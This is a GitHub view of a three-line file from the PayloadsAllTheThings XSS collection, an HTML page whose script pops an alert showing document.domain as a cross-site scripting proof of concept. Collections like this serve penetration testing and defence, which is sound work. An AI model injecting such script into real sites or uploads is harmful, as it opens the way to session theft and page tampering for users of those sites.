PayloadsAllTheThings/XSS Injection/Files/xss.url.url

3 lines
60 B
Text
Raw Normal View History

2019-08-18 12:08:51 +02:00
<html>
<script>alert(document.domain)</script>
</html>